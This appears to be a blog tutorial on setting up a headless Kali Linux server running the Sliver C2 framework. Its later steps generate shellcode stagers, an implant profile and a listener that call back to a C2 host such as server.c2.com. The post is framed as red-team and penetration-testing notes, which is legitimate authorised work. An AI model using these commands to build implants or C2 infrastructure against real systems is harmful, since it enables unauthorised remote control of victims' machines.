Post

Configuring Sliver as a C2 server

Headless Kali with Sliver C2

Notes on how to set up a headless Kali Linux server and install the Sliver C2 framework for red teaming and penetration testing.

Step 1: Configure Kali Linux Repository

Start by adding the Kali Linux repository to your system’s sources list.

1
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware" | sudo tee /etc/apt/sources.list

Step 2: Download Kali Keyring

To ensure the authenticity of Kali packages, download the latest keyring:

  1. Navigate to the Kali keyring pool: Kali Archive Keyring.
  2. Download the latest .deb file, for example:
1
wget http://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2020.2_all.deb
  1. Install the keyring:
    1
    
    dpkg -i kali-archive-keyring_2020.2_all.deb
    
  2. Clean up by removing unnecessary .deb files:
    1
    
    rm -r *.deb
    

    Step 3: Update Your System

Once the keyring is in place, update your package list:

1
sudo apt-get update

Step 4: Install Kali Linux Core and Essential Tools

To install the headless Kali Linux environment (without GUI), execute the following:

1
2
3
sudo apt-get install kali-defaults kali-linux-core
sudo apt-get install ufw
sudo ufw allow 22

Next, create a user and add them to the sudo group:

1
sudo adduser user && sudo usermod -aG sudo user

Step 5: Install Sliver Server and Client

Sliver is a modern C2 framework used for post-exploitation. First, fetch the latest releases using GitHub’s API:

1
curl -s https://api.github.com/repos/BishopFox/sliver/releases/latest \ | jq -r '.assets | .[] | .browser_download_url' \ | grep -E '(sliver-server_linux|sliver-client_linux)$'

Once you have the URLs for the server and client, use wget to download and set appropriate permissions:

1
2
3
4
# Server
wget -O /usr/local/bin/sliver-server https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux && chmod 755 /usr/local/bin/sliver-server
# Client 
wget -O /usr/local/bin/sliver https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-client_linux && chmod 755 /usr/local/bin/sliver sliver-server unpack --force

Step 6: Set Up Sliver as a Service

Create a systemd service for Sliver so it runs on boot. Open a new service configuration:

1
sudo vim /etc/systemd/system/sliver.service

Insert the following service configuration:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[Unit]
Description=Sliver
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=on-failure
RestartSec=3
User=root
ExecStart=/usr/local/bin/sliver-server daemon

[Install]
WantedBy=multi-user.target

Now, start the service:

1
systemctl start sliver

Step 7: Set Up the Operator

Generate an operator profile for your Sliver C2 setup. This allows you to interact with the C2 server and perform further actions. Run the following:

1
2
3
4
sliver-server operator --name operator --lhost operator.c2.com --save /tmp/serve

mv the_config_file /home/user/.sliver-client/configs
chown -R user:user /home/user/.sliver-client/ && chmod 600 /home/user/.sliver-client/configs/operator_localhost.cfg

Step 8: Generate Custom Shellcode

You can generate shellcode to create custom executables for your operations. Here’s how to generate a custom stager:

1
sliver > generate stager --lhost your.domain.com --lport 8443 --arch amd64 --format c --save <Location_to_save_file>

Step 9: Full Chain C2 Server with Malware

For a complete attack chain, you can create a malicious payload and listener setup. Execute the following:

1
2
3
4
5
6
profiles new --mtls server.c2.com --skip-symbols --format shellcode --arch amd64 win64
profiles
mtls
jobs
stage-listener --url tcp://server.c2.com:8443 --profile win64
generate stager --lhost server.c2.com --lport 8443 --arch amd64 --format c
This post is licensed under CC BY 4.0 by the author.